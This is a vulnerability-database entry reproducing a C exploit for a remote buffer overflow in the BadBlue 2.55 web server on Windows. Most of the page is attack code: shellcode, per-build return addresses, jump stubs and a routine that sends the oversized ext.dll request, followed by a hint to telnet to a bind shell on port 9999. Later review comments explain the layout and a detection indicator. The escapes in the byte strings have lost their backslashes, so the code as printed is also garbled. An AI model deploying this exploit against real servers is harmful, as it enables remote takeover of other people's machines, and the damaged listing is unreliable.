BadBlue 2.55 – Web Server Remote Buffer Overflow
漏洞ID | 1054931 | 漏洞类型 | |
发布时间 | 2005-02-27 | 更新时间 | 2005-02-27 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* Badblue 2.55 Web Server remote buffer overflow
* ( Version: BadBlue Personal Edition v2.55 Date: Dec. 9, 2004 )
*
* Tested under Windows 2000 Professional SP3/SP4 Spanish
* Windows 2000 Server SP4 Spanish
* Windows XP SP1 Spanish
*
* Credits:
* Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* http://lists.netsys.com/pipermail/full-disclosure/2005-February/032029.html
*
* Exploit by : Miguel Tarascó Acuña
* Tarako AT Haxorcitos.com
* Exploit Date: 26/12/2004
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr
*
***************************************************************************
*
* D:expl_badblueRelease>badblue.exe 192.168.1.82 80 1
*
* Badblue 2.55 Web Server - Remote buffer overflow
* Tarako AT Haxorcitos.com
*
* [i] Retrieving HTTP Server Header
* [i] Server : BadBlue/2.5
* [i] Connected : Yes
* [i] Target : Win2k Professional SP3/SP4 & Server SP4 (ext.dll)
* [i] Work : Complete
* [i] Now : telnet 192.168.1.82 9999
*
***************************************************************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
#define TIMEOUT 1
#define VALIDSERVER "BadBlue/2.5"
#define GETHEADER "HEAD HTTP/1.1rnrn"
#define HTTPSEND1 "GET /ext.dll?mfcisapicommand="
#define HTTPSEND2 "&page=index.htx HTTP/1.1n
Accept: */*n
Accept-Language: esn
Accept-Encodin: gzip, deflaten
User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)n
Host: "
#define HTTPSEND3 "nConnection: Keep-Alivernrn"
#define LEN 500
/* Payload bytes that main() copies to the start of the LEN-byte overflow
 * region (memcpy at buffer + strlen(HTTPSEND1)). The bytes are opaque here;
 * main()'s closing hint ("telnet <ip> 9999") suggests the payload listens on
 * TCP/9999 on the victim, which cannot be verified from this listing.
 * NOTE(review): in this copy the "\x" escapes appear to have lost their
 * backslashes (an extraction artefact), so the literal as printed is plain
 * ASCII text rather than the byte values the author intended.
 */
char shellcode[]=
"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
"x8Ax88xAFx87x03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
"xD3x4Ax8Cx88";
/* Per-build target table, indexed by main() as targets[atoi(argv[3])].
 * num    -- index shown in the usage listing.
 * name   -- printed label for the target build.
 * offset -- 4 bytes (plus NUL) written at offset 489 of the overflow region:
 *           a fixed address inside one specific build of ext.dll / ntdll.dll
 *           (the commented lines below name the instruction at each address).
 * Because each entry is tied to one exact DLL build, the technique is brittle
 * across versions; from a defender's view the stable indicator is the
 * oversized mfcisapicommand query value that main() sends, not these bytes.
 */
struct TARGETS {
int num;
char name[58];
char offset[5];
} targets[]= {
// char offset[]="x56x66x46x78"; // ntdll.dll V. 5.0.2195.6899 Windows 2k Spanish (CALL EBX)
// char offset[]="x37x25x01x10"; // ext.dll V. 1.0.0.1 (CALL EBX) Windows 2k SP4 Spanish
// char offset[]="x3ExFAx02x10"; // ext.dll V. 1.0.0.1 (FF55 0C CALL [EBP+C]) Windows XP SP1 Spanish
{ 0, "WinXP Professional SP1 (ext.dll)", "x3ExFAx02x10" }, // CALL [EBP+C]
{ 1, "Win2k Professional SP3/SP4 & Server SP4 (ext.dll)", "x37x25x01x10" }, // CALL EBX
//{ 2, "Crash", 0x41414141 }, // crash
};
/* Two-byte forward jump placed at offset 485 of the overflow region, so that
 * execution skips the 4-byte address written at offset 489. */
char jmp[]="xEBx07"; // JMP $+9 (EB 07) To jump the offset
/* Five-byte backward jump placed at offset 494, returning to the start of the
 * overflow region where the payload was copied. */
char jmpback[]="xE9x0DxFExFFxFF"; // JMP $-494 (E9 0DFEFFFF) To jump to the beginning of the shellcode
/* Probe the server with a HEAD request and check that the reply names a
 * BadBlue/2.5 build (VALIDSERVER) at a fixed position in the response.
 *
 * s  -- not used as an input: the parameter is overwritten with a freshly
 *       created socket below, so the caller's socket is never touched here.
 * sa -- address/port of the web server to probe.
 *
 * Returns 0 when the reply matched VALIDSERVER, 1 when socket creation or
 * connect() failed, the reply was shorter than 43 bytes, recv() failed or
 * returned 0, or the Server string did not match.
 * NOTE(review): if select() times out or fails, `retorno` keeps its initial 0,
 * so an unresponsive host is reported as a valid target.
 * NOTE(review): the connect() failure path returns without closesocket(),
 * leaking the socket created just above it.
 */
int CheckHeader(SOCKET s,struct sockaddr_in sa) { // Server: BadBlue/2.5
timeval tiempo; // select() timeout; presumably compiled as C++ (MSVC), where the tag is usable without `struct`
fd_set fdset;
int leido; // bytes returned by recv()
char buffer[1024]; // receive buffer for the HTTP reply
char version[11]; // exactly strlen(VALIDSERVER) bytes: no room for a terminator (see strncpy below)
int retorno=0; // 0 = header accepted, 1 = rejected or failed
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
printf("n [e] Error: socket():%dn", WSAGetLastError());
return(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("n [e] Error: connect()");
return(1); // the socket created above is not closed on this path
}
send(s,GETHEADER,strlen(GETHEADER),0); // return value not checked
tiempo.tv_sec=TIMEOUT; // wait at most TIMEOUT seconds for the reply
tiempo.tv_usec=0;
FD_ZERO( &fdset ); // clear the descriptor set
FD_SET( s, &fdset ); // watch the probe socket for readability
if ((select( s + 1 , &fdset , NULL , NULL , &tiempo )) >0) { // timeout (0) or error fall through with retorno still 0
if (FD_ISSET(s,(fd_set FAR *)&fdset)) { // true when s became readable
memset(&buffer, 0, sizeof(buffer));
if ((leido=recv( s,buffer,sizeof(buffer),0 )) > 0) {
if (leido > 42) { // bytes 32..42 of the reply must have been received
/* Assumes the Server header value begins at byte 32 of the reply -- a fixed
 * layout assumption about this server's response. Copies exactly 11 bytes
 * into the 11-byte `version`, so no NUL is written and the printf("%s")
 * that follows reads past the end of the array (undefined behaviour). */
strncpy(version,buffer+32,strlen(VALIDSERVER));
printf("n [i] Server : %s",version);
if (strncmp(version,VALIDSERVER,strlen(VALIDSERVER))!=0) retorno=1; // bounded compare, unaffected by the missing terminator
}
else retorno=1; // reply too short to hold the Server header
}
else { // recv() returned 0 (connection closed) or SOCKET_ERROR
printf("n [e] Server : Unknown");
retorno=1;
}
}
}
closesocket(s);
return(retorno);
}
/* Entry point. Validates <IP> <Port> <OS>, checks the server banner through
 * CheckHeader(), then sends a single GET to /ext.dll whose mfcisapicommand
 * query value is a LEN-byte region holding 0x90 filler, the shellcode, a short
 * forward jump, the per-target address and a backward jump.
 * argv[1] -- server IP, also echoed as the Host: header value.
 * argv[2] -- TCP port (atoi, not range-checked).
 * argv[3] -- index into targets[] (range-checked below).
 * From a detection standpoint the visible indicator is a GET to /ext.dll
 * with an oversized (~LEN bytes) mfcisapicommand parameter.
 * NOTE(review): `void main` is non-standard; `int main` with an explicit
 * return is the conforming form. inet_addr() is not checked for INADDR_NONE,
 * malloc() and send() results are unchecked, and `buffer` is never freed
 * (the process exits right after, so this is only a leak in principle).
 */
void main(int argc, char *argv[]) {
SOCKET s;
WSADATA HWSAdata;
struct sockaddr_in sa;
char *buffer=NULL; // heap-built HTTP request
UINT i;
printf("n Badblue 2.55 Web Server - Remote buffer overflow");
printf("n Tarako AT Haxorcitos.comn");
/* Reject a wrong argument count or an out-of-range target index. atoi()'s
 * int result is converted to size_t for the comparison, so a negative index
 * becomes a huge value and is rejected as well. */
if ( (argc!=4) || (atoi(argv[3])>=sizeof(targets) / sizeof(struct TARGETS))) {
printf("n OS:",argv[0]); // argv[0] is an unused extra argument (the format has no conversion)
for (i=0;i<(sizeof(targets) / sizeof(struct TARGETS));i++) {
printf("n %i - %s",i,targets[i].name);
}
printf("nn Usage: %s <IP> <Port> <OS> n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
printf("n [e] Error: WSAStartup():%dn", WSAGetLastError());
exit(1);
}
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
printf("n [e] Error: socket():%dn", WSAGetLastError());
exit(1);
}
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(atoi(argv[2])); // port value is not validated
sa.sin_addr.S_un.S_addr = inet_addr(argv[1]); // a malformed address (INADDR_NONE) is not detected
printf("n [i] Retrieving HTTP Server Header");
/* CheckHeader() opens and closes its own socket; `s` is passed by value and
 * remains unconnected until the connect() below. */
if (CheckHeader(s,sa)==1) {
printf("n [i] Aborting exploitnn");
exit(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("n [e] Error: connect()");
exit(1);
}
printf("n [i] Connected : Yes");
printf("n [i] Target : %s ",targets[atoi(argv[3])].name);
/* Request layout: HTTPSEND1 | LEN bytes (overflow region) | HTTPSEND2 |
 * argv[1] (Host: value) | HTTPSEND3 | NUL. The malloc() result is not
 * checked before use. */
buffer=(char*)malloc(sizeof(char)*(strlen(HTTPSEND1)+strlen(HTTPSEND2)+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1));
memset(buffer,0,strlen(HTTPSEND1)+strlen(HTTPSEND2)+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1);
memcpy(buffer,HTTPSEND1,strlen(HTTPSEND1));
for( i=strlen(HTTPSEND1);i<(LEN+strlen(HTTPSEND1));i++) buffer[i]=(BYTE)0x90; // fill the whole region with 0x90 (x86 NOP) before overlaying the pieces below
memcpy(buffer+strlen(HTTPSEND1),shellcode,strlen(shellcode)); // region offset 0: payload
memcpy(buffer+strlen(HTTPSEND1)+485,jmp,strlen(jmp)); // region offset 485: 2-byte jump over the address
memcpy(buffer+strlen(HTTPSEND1)+489,targets[atoi(argv[3])].offset,strlen(targets[atoi(argv[3])].offset)); // region offset 489: per-target address (strlen stops at a NUL byte)
memcpy(buffer+strlen(HTTPSEND1)+494,jmpback,strlen(jmpback)); // region offset 494: jump back to the start of the region
memcpy(buffer+strlen(HTTPSEND1)+LEN,HTTPSEND2,strlen(HTTPSEND2)); // remaining request line and headers
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEND2),argv[1],strlen(argv[1])); // Host: value
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEND2)+strlen(argv[1]),HTTPSEND3,strlen(HTTPSEND3));
/* strlen() stops at the first NUL, so a zero byte anywhere in the request
 * would truncate what is sent; the send() return value is ignored. */
send(s,buffer,strlen(buffer),0);
closesocket(s);
printf("n [i] Work : Complete");
printf("n [i] Now : telnet %s 9999n",argv[1]); // the hint implies the payload listens on TCP/9999 on the target
}
// milw0rm.com [2005-02-27]